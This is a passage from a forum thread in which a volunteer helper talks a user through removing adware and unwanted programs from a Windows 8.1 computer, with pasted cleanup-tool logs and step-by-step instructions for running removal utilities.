    Task: {9CCB0C95-9CC9-4F2E-8D83-663775D82970} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
    C:\Program Files (x86)\OLBPre
    Task: {B1D873D1-5121-42A0-9C92-76FBCD27335F} - System32\Tasks\Sixth => C:\Users\hersheychoco9\AppData\Roaming\Sixth\Sixth.exe [2015-12-10] () <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Roaming\Sixth
    Task: {CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611} - System32\Tasks\Ijufcyl => C:\PROGRA~1\SHOPPE~1\Osifch.bat
    C:\PROGRA~1\SHOPPE~1
    C:\PROGRA~1\SHOPPE~1\Osifch.bat
    Task: {D07CC060-B787-4C15-B547-123801C27E3B} - System32\Tasks\Only-search Updater => C:\Windows\system32\wscript.exe [2014-10-28] (Microsoft Corporation) <==== ATTENTION

    Task: {80FA20B2-A979-4EAB-9EBA-6D46F57955A1} - System32\Tasks\Genius => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] () <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Roaming\Genius


    *****************

    [5112] C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe => process closed successfully.
    C:\Users\hersheychoco9\AppData\Local\BrowserAir => moved successfully
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ezvtum => value removed successfully
    C:\Users\hersheychoco9\AppData\Local\ezvtum.dll => moved successfully
    "HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4d6de65c-5455-11e4-825b-a0886955d281}" => key removed successfully
    HKCR\CLSID\{4d6de65c-5455-11e4-825b-a0886955d281} => key not found.
    "HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{65359199-e247-11e4-828b-a0886955d281}" => key removed successfully
    HKCR\CLSID\{65359199-e247-11e4-828b-a0886955d281} => key not found.
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => key removed successfully
    HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001" => key removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002" => key removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003" => key removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004" => key removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016" => key removed successfully

    ========= RemoveProxy: =========

    "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
    HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
    HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


    ========= End of RemoveProxy: =========

    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key not found.
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
    "HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6EB44F16-E471-4C00-BC7C-49D2839C991D}" => key removed successfully
    HKCR\CLSID\{6EB44F16-E471-4C00-BC7C-49D2839C991D} => key not found.
    Firefox "homepage" removed successfully
    Firefox SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)"); removed successfully
    Firefox DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)"); removed successfully
    Firefox "Keyword.URL" removed successfully
    Firefox "newtab" removed successfully
    C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml => moved successfully
    "C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml" => not found.
    HKLM\Software\Mozilla\Firefox\Extensions\\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75} => value removed successfully
    HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\jid1-xNAj4KGyf5wyhg@jetpack => value removed successfully
    HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75} => value removed successfully
    "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gihfmmedoddijgnhkgfgnkeohkpbipol" => key removed successfully
    NetprotAdp => service removed successfully
    SushiLeadsUpdaterService => service removed successfully
    Update Simple for You => service removed successfully
    WajaNetEn Monitor => service removed successfully
    WsDrvInst => service removed successfully
    BAPIDRV => service removed successfully
    cherimoya => service removed successfully
    EagleX64 => service removed successfully
    iscFlash => service removed successfully
    PCDSRVC{3B54B31B-D06B6431-06020200}_0 => service removed successfully
    X6va029 => service removed successfully
    {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64 => service removed successfully
    "C:\Users\hersheychoco9\AppData\Local\BrowserAir" => not found.
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean => moved successfully
    C:\Program Files (x86)\DailyPCClean => moved successfully
    C:\Users\hersheychoco9\Documents\DailyPCClean => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean => moved successfully
    C:\Program Files (x86)\Roboscan_IS_Free.exe => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log => moved successfully
    "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll" => not found.
    C:\Users\hersheychoco9\AppData\Local\recently-used.xbel => moved successfully
    C:\Users\hersheychoco9\AppData\Local\uninstall.exe => moved successfully
    C:\ProgramData\DP45977C.lfl => moved successfully
    C:\ProgramData\tempimage.bmp => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27}" => key removed successfully
    C:\Windows\System32\Tasks\Pool Component => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pool Component" => key removed successfully
    C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{63B79E46-FBBD-4C8A-B7AA-45C6731402FF}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63B79E46-FBBD-4C8A-B7AA-45C6731402FF}" => key removed successfully
    C:\Windows\System32\Tasks\IBUpd2 => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd2" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{75F57505-E997-49EF-8280-CBEDA94B26CE}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{75F57505-E997-49EF-8280-CBEDA94B26CE}" => key removed successfully
    C:\Windows\System32\Tasks\Seventh => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Seventh" => key removed successfully
    C:\Users\hersheychoco9\AppData\Roaming\Seventh => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{82DB69B4-7124-4705-AFC2-219F5EBB3241}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82DB69B4-7124-4705-AFC2-219F5EBB3241}" => key removed successfully
    C:\Windows\System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{86B9E75F-1889-49B5-B36A-35C70EC3D395}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86B9E75F-1889-49B5-B36A-35C70EC3D395}" => key removed successfully
    C:\Windows\System32\Tasks\Pool Component2 => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pool Component2" => key removed successfully
    C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9CCB0C95-9CC9-4F2E-8D83-663775D82970}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9CCB0C95-9CC9-4F2E-8D83-663775D82970}" => key removed successfully
    C:\Windows\System32\Tasks\LaunchPreSignup => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup" => key removed successfully
    "C:\Program Files (x86)\OLBPre" => not found.
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B1D873D1-5121-42A0-9C92-76FBCD27335F}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1D873D1-5121-42A0-9C92-76FBCD27335F}" => key removed successfully
    C:\Windows\System32\Tasks\Sixth => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sixth" => key removed successfully
    C:\Users\hersheychoco9\AppData\Roaming\Sixth => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611}" => key removed successfully
    C:\Windows\System32\Tasks\Ijufcyl => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ijufcyl" => key removed successfully
    "C:\PROGRA~1\SHOPPE~1" => not found.
    "C:\PROGRA~1\SHOPPE~1\Osifch.bat" => not found.
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D07CC060-B787-4C15-B547-123801C27E3B}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D07CC060-B787-4C15-B547-123801C27E3B}" => key removed successfully
    C:\Windows\System32\Tasks\Only-search Updater => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Only-search Updater" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{80FA20B2-A979-4EAB-9EBA-6D46F57955A1}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{80FA20B2-A979-4EAB-9EBA-6D46F57955A1}" => key removed successfully
    C:\Windows\System32\Tasks\Genius => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Genius" => key removed successfully
    C:\Users\hersheychoco9\AppData\Roaming\Genius => moved successfully

    ==== End of Fixlog 20:30:16 ====
     
  14. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    I was able to uninstall Pool Component but couldn't find the Setup one
     
  15. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    [​IMG] After restart see if you can connect.
     
    hersheychoco likes this.
  16. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    THANK YOU SO MUCH! YOU'RE A LIFE SAVER!!!!!!(y):):)
     
  17. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    We're not done but I'm glad to hear good news :)

    [​IMG] Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Windows Vista/7/8 users: right click on RogueKiller.exe, click Run as Administrator
    • Otherwise just double-click on RogueKiller.exe
    • Pre-scan will start. Let it finish.
    • Click on SCAN button.
    • Wait until the Status box shows Scan Finished
    • Click on Delete.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.
    • If RogueKiller has been blocked, do not hesitate to try a few times more. If really won't run, rename it to winlogon.exe (or winlogon.com) and try again
    [​IMG] Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
    NOTE. If you already have MBAM 2.0 installed scroll down.
    • Double-click mbam-setup-2.0.0.1000.exe and follow the prompts to install the program.
    • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
    • Click Finish.
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    If you already have MBAM 2.0 installed:
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    How to get logs:
    (Export log to save as txt)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Export'.
    • Click 'Text file (*.txt)'
    • In the Save File dialog box which appears, click on Desktop.
    • In the File name: box type a name for your scan log.
    • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
    • Click Ok
    • Attach that saved log to your next reply.
    (Copy to clipboard for pasting into forum replies or tickets)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Copy to Clipboard'
    • Paste the contents of the clipboard into your reply.
    [​IMG] Please download AdwCleaner by Xplode onto your desktop.
    • Close all open programs and internet browsers.
    • Double click on adwcleaner.exe to run the tool.
    • Click on Scan button.
    • When the scan has finished click on Clean button.
    • Your computer will be rebooted automatically. A text file will open after the restart.
    • Please post the contents of that logfile with your next reply.
    • You can find the logfile at C:\AdwCleaner[S1].txt as well.
    [​IMG] Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
  18. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    RogueKiller V11.0.6.0 [Jan 4 2016] (Free) by Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : http://forum.adlice.com
    Website : http://www.adlice.com/software/roguekiller/
    Blog : http://www.adlice.com

    Operating System : Windows 8.1 (6.3.9600) 64 bits version
    Started in : Normal mode
    User : hersheychoco9 [Administrator]
    Started from : C:\Users\hersheychoco9\Downloads\RogueKiller.exe
    Mode : Delete -- Date : 01/05/2016 21:12:49

    ¤¤¤ Processes : 0 ¤¤¤

    ¤¤¤ Registry : 18 ¤¤¤
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\DAILYPCCLEAN -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814} (C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll) -> Not selected
    [PUP] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
    [PUP] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected

    ¤¤¤ Tasks : 2 ¤¤¤
    [PUP] \Easy Driver Pro Schedule -- "C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe" -> Not selected
    [PUP] \SushiLeads -- C:\Program Files (x86)\sushileads\ScheduledTask.exe -> Not selected

    ¤¤¤ Files : 12 ¤¤¤
    [PUP][Folder] C:\Users\hersheychoco9\AppData\Roaming\WTools -> Deleted
    [Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\explorer.exe -> ERROR [5]
    [Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\userinit.exe -> ERROR [5]
    [Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\winlogon.exe -> ERROR [5]
    [PUP][Folder] C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0} -> Deleted
    [PUP][Folder] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032 -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032\vnsg3AF.tmp -> Deleted
    [PUP][Folder] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032 -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032\vnsvBA11.tmp -> Deleted
    [PUP][Folder] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032 -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032\vnskFE9C.tmp -> Deleted
    [PUP][Folder] C:\Program Files (x86)\onlysearch -> Deleted
    [PUP][Folder] C:\Program Files (x86)\onlysearch\onlysearch\1.4.2.4 -> Deleted
    [PUP][File] C:\Program Files (x86)\onlysearch\onlysearch\updt.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\onlysearch\onlysearch -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Probit Software -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Super Optimizer -> Deleted
    [PUP][File] C:\Program Files (x86)\Super Optimizer\SupOptStart.exe -> Deleted
    [PUP][Folder] C:\Program Files (x86)\sushileads -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\AppResources.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\Common.Logging.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\HtmlAgilityPack.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\Microsoft.Win32.TaskScheduler.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\Newtonsoft.Json.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\NpUpdaterService.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\Quartz.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\RestSharp.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\SushiLeadsApplication.exe -> Deleted

    ¤¤¤ Hosts File : 0 ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

    ¤¤¤ Web browsers : 0 ¤¤¤

    ¤¤¤ MBR Check : ¤¤¤
    +++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
    --- User ---
    [MBR] ac549645ac34136e1ed8d1039e17d487
    [BSP] b481a814b9dfd05236432bf6c92742d1 : Empty|VT.Unknown MBR Code
    Partition table:
    0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 500 MB
    1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1026048 | Size: 40 MB
    2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1107968 | Size: 128 MB
    3 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1370112 | Size: 750 MB
    4 - Basic data partition | Offset (sectors): 2906112 | Size: 942158 MB
    5 - [SYSTEM][MAN-MOUNT] Microsoft recovery partition | Offset (sectors): 1932445696 | Size: 10291 MB
    User = LL1 ... OK
    User = LL2 ... OK
     
  19. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    I can't find the RKreport.txt file
     
  20. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    You just posted it.
     
  21. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Oh lol okay I thought there were two different txt files due to the name XD
     
  22. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Here's the scanned log
    it says paste or attached so I don't know..

    File:
    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Scan Date: 1/5/2016
    Scan Time: 9:26 PM
    Logfile: Scannedlog2016.txt
    Administrator: Yes

    Version: 2.2.0.1024
    Malware Database: v2016.01.06.01
    Rootkit Database: v2016.01.05.01
    License: Free
    Malware Protection: Disabled
    Malicious Website Protection: Disabled
    Self-protection: Disabled

    OS: Windows 8.1
    CPU: x64
    File System: NTFS
    User: hersheychoco9

    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 387326
    Time Elapsed: 13 min, 17 sec

    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    Processes: 0
    (No malicious items detected)

    Modules: 0
    (No malicious items detected)

    Registry Keys: 0
    (No malicious items detected)

    Registry Values: 0
    (No malicious items detected)

    Registry Data: 0
    (No malicious items detected)

    Folders: 0
    (No malicious items detected)

    Files: 0
    (No malicious items detected)

    Physical Sectors: 0
    (No malicious items detected)


    (end)
     
    Last edited: Jan 5, 2016
  23. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    Always paste.
     
  24. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Okay, running the last two tools now.
     
  25. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    # AdwCleaner v5.028 - Logfile created 05/01/2016 at 21:59:40
    # Updated 04/01/2016 by Xplode
    # Database : 2016-01-04.2 [Server]
    # Operating system : Windows 8.1 (x64)
    # Username : hersheychoco9 - CHOCOYAUTJA
    # Running from : C:\Users\hersheychoco9\Desktop\adwcleaner_5.028.exe
    # Option : Cleaning
    # Support : http://toolslib.net/forum

    ***** [ Services ] *****


    ***** [ Folders ] *****

    [-] Folder Deleted : C:\Program Files\WajaNetEn
    [-] Folder Deleted : C:\Users\hersheychoco9\AppData\Local\YSearchUtil
    [-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Common\LuaRT
    [-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Store
    [-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
    [-] Folder Deleted : C:\Users\hersheychoco9\Documents\Probit Software
    [-] Folder Deleted : C:\Windows\Update Pro
    [-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\StormWarnings
    [-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil
    [-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\StormWarnings
    [-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\DhcpUpdater

    ***** [ Files ] *****


    ***** [ DLLs ] *****


    ***** [ Shortcuts ] *****


    ***** [ Scheduled tasks ] *****

    [-] Task Deleted : Genius_Interval

    ***** [ Registry ] *****

